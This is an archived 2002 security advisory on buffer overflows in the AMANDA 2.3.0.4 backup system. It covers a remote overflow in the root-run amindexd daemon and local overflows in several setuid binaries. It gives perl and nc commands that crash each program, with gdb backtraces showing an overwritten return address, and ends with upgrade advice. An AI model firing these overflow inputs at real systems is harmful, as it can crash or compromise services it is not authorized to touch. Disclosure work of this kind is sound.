Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5375.htm

Amanda backup system various buffer overflows, local & remote



30th May 2002 [SBWID-5375]
COMMAND

	Amanda various buffer overflows, local & remote

SYSTEMS AFFECTED

	2.3.0.4

PROBLEM

	zillion  [http://www.safemode.org]   published   a   security   advisory
	regarding AMANDA. The Advanced Maryland Automatic Network Disk  Archiver
	(AMANDA) is a backup  system  which  is  available  for  many  different
	Unix-based operating systems. Several setuid and setgid  binaries  which
	are installed by this package contain  buffer  overflow  vulnerabilities
	that  can  be  used  to  execute  shellcode  with  elevated  privileges.
	Additionally, the amindexd daemon contains a remote  overflow  bug  that
	can lead to a remote system compromise.
	

	The affected version of AMANDA is an old package but is often  used  due
	to  compatibility  problems  with  newer  versions.  For  example,  this
	package  was  until  recently  shipped  with  the  FreeBSD   4.5   ports
	collection.
	

	The local overflows are all found in files that can only be executed  by
	those that are member of the operator group. This is  a  big  limitation
	to anyone that is trying to abuse amanda locally  as  normal  users  are
	not member of this group. The big  risk  here  is  the  amindexd  daemon
	(10082/TCP) that runs as root and contains several  overflows  of  which
	two can be  triggered  without  any  knowledge  of  the  affect  systems
	configuration.
	

	 

	 The amindexd daemon (remote, runs as root)

	 -------------------------------------------

	

	Long commands send to this server will result in an  immediate  overflow
	This  does  not  require   any   knowledge   of   the   affect   systems
	configuration.  Simple replication of this overflow:
	

	

	perl -e \'print \"A\" x 260;print \"BBBB\";\' | nc localhost 10082

	perl -e \'print \"DATE \"; print \"A\" x 260;\' | nc localhost 10082

	

	

	The below listed file are only accessible by users that  are  member  of
	the group \'operator\'. This is a big limitation for  anyone  that  will
	try to abuse them ;).
	

	

	 The amcheck file (setuid root)

	 -------------------------------------------

	

	

	bash-2.05a# /usr/local/bin/amcheck `perl -e \'print \"A\" x 1000\'`

	Segmentation fault (core dumped)

	

	(gdb) bt

	#0  0x2814c022 in ?? ()

	#1  0x280f8c0a in ?? ()

	#2  0x804d671 in ?? ()

	#3  0x41414141 in ?? ()

	Cannot access memory at address 0x41414141.

	(gdb)

	

	

	

	 The amgetidx file (setuid operator)

	 -------------------------------------------

	

	

	(gdb) bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx

	

	(gdb) r `perl -e \'print \"A\" x 3000\'`

	Starting program: /usr/local/libexec/amanda/amgetidx `perl -e \'print \"A\" x

	3000\'`

	(no debugging symbols found)...(no debugging symbols found)...(no

	debugging symbols found)...(no debugging symbols found)...

	Program received signal SIGSEGV, Segmentation fault.

	0x28144022 in vfprintf () from /usr/lib/libc.so.4

	(gdb) bt

	#0  0x28144022 in vfprintf () from /usr/lib/libc.so.4

	#1  0x280f0c0a in vsprintf () from /usr/lib/libc.so.4

	#2  0x804c8dd in getsockname ()

	#3  0x41414141 in ?? ()

	Error accessing memory address 0x41414141: Bad address.

	(gdb)

	

	

	

	 The amtrmidx file  (setuid operator)

	 -------------------------------------------

	

	

	bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx

	

	(gdb) r `perl -e \'print \"A\" x 3000\'`

	Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e \'print \"A\" x

	3000\'`

	(no debugging symbols found)...(no debugging symbols found)...(no

	debugging symbols found)...(no debugging symbols found)...

	Program received signal SIGSEGV, Segmentation fault.

	0x28141022 in vfprintf () from /usr/lib/libc.so.4

	(gdb) bt

	#0  0x28141022 in vfprintf () from /usr/lib/libc.so.4

	#1  0x280edc0a in vsprintf () from /usr/lib/libc.so.4

	#2  0x804b291 in free ()

	#3  0x41414141 in ?? ()

	Error accessing memory address 0x41414141: Bad address.

	(gdb)

	

	

	

	 The createindex-dump file (setuid operator)

	 -------------------------------------------

	

	

	sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump

	

	(gdb) r `perl -e \'print \"A\" x 4000\'` a a a

	Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e

	\'print \"A\" x 4000\'` a a a

	(no debugging symbols found)...(no debugging symbols found)...(no

	debugging symbols found)...(no debugging symbols found)...

	Program received signal SIGSEGV, Segmentation fault.

	0x2814398c in getenv () from /usr/lib/libc.so.4

	(gdb) bt

	#0  0x2814398c in getenv () from /usr/lib/libc.so.4

	#1  0x28142801 in isatty () from /usr/lib/libc.so.4

	#2  0x2814362e in malloc () from /usr/lib/libc.so.4

	#3  0x280fbec2 in popen () from /usr/lib/libc.so.4

	#4  0x8048874 in atoi ()

	#5  0x41414141 in ?? ()

	Error accessing memory address 0x41414141: Bad address.

	(gdb)

	

	

	

	 The createindex-gnutar file (setuid operator)

	 ----------------------------------------------

	

	

	bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar

	(gdb) r `perl -e \'print \"A\" x 4000\'` a a a

	Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e

	\'print \"A\" x 4000\'` a a a

	(no debugging symbols found)...(no debugging symbols found)...(no

	debugging symbols found)...(no debugging symbols found)...

	Program received signal SIGSEGV, Segmentation fault.

	0x2814398c in getenv () from /usr/lib/libc.so.4

	(gdb) bt

	#0  0x2814398c in getenv () from /usr/lib/libc.so.4

	#1  0x28142801 in isatty () from /usr/lib/libc.so.4

	#2  0x2814362e in malloc () from /usr/lib/libc.so.4

	#3  0x280fbec2 in popen () from /usr/lib/libc.so.4

	#4  0x8048811 in atoi ()

	#5  0x41414141 in ?? ()

	Error accessing memory address 0x41414141: Bad address.

	(gdb)

	

SOLUTION

	Upgrade AMANDA to the latest stable version , which  is  available  from
	the developers web site: http://www.amanda.org
	

	As noted earlier, this affects the  FreeBSD  ports  collection  that  is
	shipped with 4.5 or earlier. FreeBSD was contacted and has  removed  the
	vulnerable AMANDA port.
	

	Thanks AMANDA developers and FreeBSD  for  the  fast  reaction  on  this
	issue.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH